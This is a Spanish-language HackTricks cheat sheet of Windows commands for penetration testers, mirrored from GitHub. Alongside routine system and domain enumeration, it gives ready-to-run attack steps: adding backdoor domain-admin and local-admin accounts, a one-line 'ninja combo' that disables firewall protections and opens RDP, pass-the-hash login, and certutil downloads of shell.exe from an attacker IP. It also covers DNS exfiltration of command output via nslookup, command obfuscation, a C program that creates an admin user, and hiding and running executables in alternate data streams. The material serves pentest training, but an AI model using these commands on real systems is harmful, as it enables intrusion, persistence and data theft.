mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-04 18:40:54 +00:00
447 lines
17 KiB
Markdown
447 lines
17 KiB
Markdown
# Comandos básicos de Win para Pentesters
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprende a hackear AWS desde cero hasta convertirte en un experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión del PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
## Información del sistema
|
||
|
||
### Información de versión y parches
|
||
```bash
|
||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
|
||
systeminfo
|
||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
|
||
wmic computersystem LIST full #Get PC info
|
||
|
||
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
|
||
wmic qfe list brief #Updates
|
||
|
||
hostname
|
||
|
||
DRIVERQUERY #3rd party driver vulnerable?
|
||
```
|
||
### Entorno
|
||
```bash
|
||
set #List all environment variables
|
||
```
|
||
Algunas variables de entorno para destacar:
|
||
|
||
* **COMPUTERNAME**: Nombre del equipo
|
||
* **TEMP/TMP:** Carpeta temporal
|
||
* **USERNAME:** Tu nombre de usuario
|
||
* **HOMEPATH/USERPROFILE:** Directorio de inicio
|
||
* **windir:** C:\Windows
|
||
* **OS**: Sistema operativo Windows
|
||
* **LOGONSERVER**: Nombre del controlador de dominio
|
||
* **USERDNSDOMAIN**: Nombre de dominio para usar con DNS
|
||
* **USERDOMAIN**: Nombre del dominio
|
||
```bash
|
||
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
|
||
```
|
||
### Discos montados
|
||
```bash
|
||
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
|
||
wmic logicaldisk get caption,description,providername
|
||
```
|
||
### [Defensor](authentication-credentials-uac-and-efs.md#defender)
|
||
|
||
### Papelera de reciclaje
|
||
```bash
|
||
dir C:\$Recycle.Bin /s /b
|
||
```
|
||
### Procesos, Servicios y Software
|
||
```bash
|
||
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
|
||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||
tasklist /V #List processes
|
||
tasklist /SVC #links processes to started services
|
||
net start #Windows Services started
|
||
wmic service list brief #List services
|
||
sc query #List of services
|
||
dir /a "C:\Program Files" #Installed software
|
||
dir /a "C:\Program Files (x86)" #Installed software
|
||
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
|
||
```
|
||
## Información del dominio
|
||
```bash
|
||
# Generic AD info
|
||
echo %USERDOMAIN% #Get domain name
|
||
echo %USERDNSDOMAIN% #Get domain name
|
||
echo %logonserver% #Get name of the domain controller
|
||
set logonserver #Get name of the domain controller
|
||
set log #Get name of the domain controller
|
||
gpresult /V # Get current policy applied
|
||
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
|
||
|
||
# Users
|
||
dsquery user #Get all users
|
||
net user /domain #List all users of the domain
|
||
net user <ACCOUNT_NAME> /domain #Get information about that user
|
||
net accounts /domain #Password and lockout policy
|
||
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
|
||
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
|
||
|
||
# Groups
|
||
net group /domain #List of domain groups
|
||
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
|
||
net group "Domain Admins" /domain #List users with domain admin privileges
|
||
net group "domain computers" /domain #List of PCs connected to the domain
|
||
net group "Domain Controllers" /domain #List PC accounts of domains controllers
|
||
wmic group list /format:list # Information about all local groups
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
|
||
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
|
||
|
||
# Computers
|
||
dsquery computer #Get all computers
|
||
net view /domain #Lis of PCs of the domain
|
||
nltest /dclist:<DOMAIN> #List domain controllers
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
|
||
|
||
# Trust relations
|
||
nltest /domain_trusts #Mapping of the trust relationships
|
||
|
||
# Get all objects inside an OU
|
||
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
|
||
```
|
||
### Registros y Eventos
|
||
```bash
|
||
#Make a security query using another credentials
|
||
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
|
||
```
|
||
## Usuarios y Grupos
|
||
|
||
### Usuarios
|
||
```bash
|
||
#Me
|
||
whoami /all #All info about me, take a look at the enabled tokens
|
||
whoami /priv #Show only privileges
|
||
|
||
# Local users
|
||
net users #All users
|
||
dir /b /ad "C:\Users"
|
||
net user %username% #Info about a user (me)
|
||
net accounts #Information about password requirements
|
||
wmic USERACCOUNT Get Domain,Name,Sid
|
||
net user /add [username] [password] #Create user
|
||
|
||
# Other users looged
|
||
qwinsta #Anyone else logged in?
|
||
|
||
#Lauch new cmd.exe with new creds (to impersonate in network)
|
||
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||
|
||
#Check current logon session as administrator using logonsessions from sysinternals
|
||
logonsessions.exe
|
||
logonsessions64.exe
|
||
```
|
||
### Grupos
|
||
```bash
|
||
#Local
|
||
net localgroup #All available groups
|
||
net localgroup Administrators #Info about a group (admins)
|
||
net localgroup administrators [username] /add #Add user to administrators
|
||
|
||
#Domain
|
||
net group /domain #Info about domain groups
|
||
net group /domain <domain_group_name> #Users that belongs to the group
|
||
```
|
||
### Listar sesiones
|
||
```
|
||
qwinsta
|
||
klist sessions
|
||
```
|
||
### Política de Contraseñas
|
||
```
|
||
net accounts
|
||
```
|
||
### Credenciales
|
||
```bash
|
||
cmdkey /list #List credential
|
||
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
|
||
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
|
||
```
|
||
### Persistencia con usuarios
|
||
```bash
|
||
# Add domain user and put them in Domain Admins group
|
||
net user username password /ADD /DOMAIN
|
||
net group "Domain Admins" username /ADD /DOMAIN
|
||
|
||
# Add local user and put them local Administrators group
|
||
net user username password /ADD
|
||
net localgroup Administrators username /ADD
|
||
|
||
# Add user to insteresting groups:
|
||
net localgroup "Remote Desktop Users" UserLoginName /add
|
||
net localgroup "Debugger users" UserLoginName /add
|
||
net localgroup "Power users" UserLoginName /add
|
||
```
|
||
## Red
|
||
|
||
### Interfaces, Rutas, Puertos, Hosts y DNSCache
|
||
```bash
|
||
ipconfig /all #Info about interfaces
|
||
route print #Print available routes
|
||
arp -a #Know hosts
|
||
netstat -ano #Opened ports?
|
||
type C:\WINDOWS\System32\drivers\etc\hosts
|
||
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
|
||
```
|
||
### Firewall
|
||
```bash
|
||
netsh firewall show state # FW info, open ports
|
||
netsh advfirewall firewall show rule name=all
|
||
netsh firewall show config # FW info
|
||
Netsh Advfirewall show allprofiles
|
||
|
||
NetSh Advfirewall set allprofiles state off #Turn Off
|
||
NetSh Advfirewall set allprofiles state on #Trun On
|
||
netsh firewall set opmode disable #Turn Off
|
||
|
||
#How to open ports
|
||
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
|
||
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
|
||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||
|
||
#Enable Remote Desktop
|
||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||
::netsh firewall set service remotedesktop enable #I found that this line is not needed
|
||
::sc config TermService start= auto #I found that this line is not needed
|
||
::net start Termservice #I found that this line is not needed
|
||
|
||
#Enable Remote Desktop with wmic
|
||
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||
##or
|
||
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||
|
||
#Enable Remote assistance:
|
||
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
|
||
netsh firewall set service remoteadmin enable
|
||
|
||
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
|
||
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
|
||
|
||
::Connect to RDP (using hash or password)
|
||
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
|
||
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
|
||
```
|
||
### Compartir
|
||
```bash
|
||
net view #Get a list of computers
|
||
net view /all /domain [domainname] #Shares on the domains
|
||
net view \\computer /ALL #List shares of a computer
|
||
net use x: \\computer\share #Mount the share locally
|
||
net share #Check current shares
|
||
```
|
||
### Wifi
|
||
|
||
#### Netsh
|
||
|
||
Netsh es una herramienta de línea de comandos que permite a los usuarios configurar y mostrar la configuración de red. Puede ser utilizado para administrar perfiles de Wi-Fi, entre otras funciones.
|
||
|
||
##### Mostrar perfiles Wi-Fi guardados
|
||
|
||
```plaintext
|
||
netsh wlan show profiles
|
||
```
|
||
|
||
##### Mostrar detalles de un perfil Wi-Fi específico
|
||
|
||
```plaintext
|
||
netsh wlan show profile name="nombre_del_perfil" key=clear
|
||
```
|
||
|
||
##### Exportar perfiles Wi-Fi a un archivo
|
||
|
||
```plaintext
|
||
netsh wlan export profile folder="ruta_del_archivo"
|
||
```
|
||
|
||
##### Eliminar un perfil Wi-Fi
|
||
|
||
```plaintext
|
||
netsh wlan delete profile name="nombre_del_perfil"
|
||
```
|
||
```bash
|
||
netsh wlan show profile #AP SSID
|
||
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
|
||
```
|
||
### SNMP
|
||
```
|
||
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||
```
|
||
### Interfaces de Red
|
||
```bash
|
||
ipconfig /all
|
||
```
|
||
### Tabla ARP
|
||
```bash
|
||
arp -A
|
||
```
|
||
## Descargar
|
||
|
||
Bitsadmin.exe
|
||
```
|
||
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||
```
|
||
`CertReq.exe`
|
||
```
|
||
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||
```
|
||
`Certutil.exe` es una herramienta de línea de comandos que se utiliza para realizar diversas operaciones relacionadas con certificados en Windows.
|
||
```
|
||
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
|
||
```
|
||
**Encuentra mucho más buscando `Descargar` en [https://lolbas-project.github.io](https://lolbas-project.github.io/)**
|
||
|
||
## Varios
|
||
```bash
|
||
cd #Get current dir
|
||
cd C:\path\to\dir #Change dir
|
||
dir #List current dir
|
||
dir /a:h C:\path\to\dir #List hidden files
|
||
dir /s /b #Recursive list without shit
|
||
time #Get current time
|
||
date #Get current date
|
||
shutdown /r /t 0 #Shutdown now
|
||
type <file> #Cat file
|
||
|
||
#Runas
|
||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
|
||
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||
|
||
#Hide
|
||
attrib +h file #Set Hidden
|
||
attrib -h file #Quit Hidden
|
||
|
||
#Give full control over a file that you owns
|
||
icacls <FILE_PATH> /t /e /p <USERNAME>:F
|
||
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
|
||
|
||
#Recursive copy to smb
|
||
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
|
||
|
||
#exe2bat to transform exe file in bat file
|
||
|
||
#ADS
|
||
dir /r #Detect ADS
|
||
more file.txt:ads.txt #read ADS
|
||
powershell (Get-Content file.txt -Stream ads.txt)
|
||
|
||
# Get error messages from code
|
||
net helpmsg 32 #32 is the code in that case
|
||
```
|
||
### Saltar la Lista Negra de Caracteres
|
||
```bash
|
||
echo %HOMEPATH:~6,-11% #\
|
||
who^ami #whoami
|
||
```
|
||
### DOSfuscation
|
||
|
||
Genera una línea de CMD obfuscada
|
||
```powershell
|
||
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
|
||
cd Invoke-DOSfuscation
|
||
Import-Module .\Invoke-DOSfuscation.psd1
|
||
Invoke-DOSfuscation
|
||
help
|
||
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
|
||
encoding
|
||
```
|
||
### Listas de control de acceso de direcciones de escucha
|
||
|
||
Puedes escuchar en [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) sin ser administrador.
|
||
```bash
|
||
netsh http show urlacl
|
||
```
|
||
### Shell DNS manual
|
||
|
||
**Atacante** (Kali) debe usar una de estas 2 opciones:
|
||
```bash
|
||
sudo responder -I <iface> #Active
|
||
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
|
||
```
|
||
#### Víctima
|
||
|
||
**Técnica `for /f tokens`**: Esto nos permite ejecutar comandos, obtener las primeras X palabras de cada línea y enviarlas a través de DNS a nuestro servidor
|
||
```bash
|
||
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
|
||
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
|
||
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
|
||
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
|
||
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
|
||
#More complex commands
|
||
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
|
||
```
|
||
También puedes **redirigir** la salida, y luego **leerla**.
|
||
```
|
||
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
|
||
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
|
||
```
|
||
## Llamando a CMD desde código C
|
||
```c
|
||
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
|
||
|
||
// When executed by Administrator this program will create a user and then add him to the administrators group
|
||
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
|
||
// upx -9 addmin.exe
|
||
|
||
int main (){
|
||
int i;
|
||
i=system("net users otherAcc 0TherAcc! /add");
|
||
i=system("net localgroup administrators otherAcc /add");
|
||
return 0;
|
||
}
|
||
```
|
||
## Hoja de trucos de Secuencias de Datos Alternas (ADS/Alternate Data Stream)
|
||
|
||
**Ejemplos tomados de [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f). ¡Hay muchos más allí!**
|
||
```bash
|
||
## Selected Examples of ADS Operations ##
|
||
|
||
### Adding Content to ADS ###
|
||
# Append executable to a log file as an ADS
|
||
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
|
||
# Download a script directly into an ADS
|
||
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||
|
||
### Discovering ADS Content ###
|
||
# List files and their ADS
|
||
dir /R
|
||
# Use Sysinternals tool to list ADS of a file
|
||
streams.exe <c:\path\to\file>
|
||
|
||
### Extracting Content from ADS ###
|
||
# Extract an executable stored in an ADS
|
||
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
|
||
|
||
### Executing ADS Content ###
|
||
# Execute an executable stored in an ADS using WMIC
|
||
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
|
||
# Execute a script stored in an ADS using PowerShell
|
||
powershell -ep bypass - < c:\temp:ttt
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Red Team de AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
||
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión del PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|